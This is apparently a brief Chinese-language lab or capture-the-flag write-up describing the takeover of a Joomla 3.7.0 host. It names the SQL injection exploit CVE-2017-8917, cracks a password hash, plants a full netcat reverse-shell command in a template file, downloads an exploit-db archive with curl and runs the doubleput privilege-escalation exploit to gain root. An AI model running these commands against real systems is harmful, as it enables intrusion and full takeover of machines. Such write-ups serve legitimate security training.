访问服务,发现是 joomla 服务,使用 joomlacan 扫描
joomlascan -u 192.168.6.129
3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917)
github 下载 exp 然后运行,获取到用户名密码 hash
使用 hashcat 破解 hash,破解密码得 snoopy
登录到后台
发现提示,需要获取到 root 权限
编辑模版,修改 index.php,nc 反弹 shell
rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 192.168.6.128 1234 >/tmp/bd
kali 监听 1234 端口:nc -lnvp 1234
exploit-db 搜索相关提权脚本,搜索到
https://www.exploit-db.com/exploits/39772
curl -O https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
tar -xvf exploit.tar
./compile.sh
./doubleput
成功提权,gcc 编译时 warning 提示,误以为是 error 报错,耽误了好久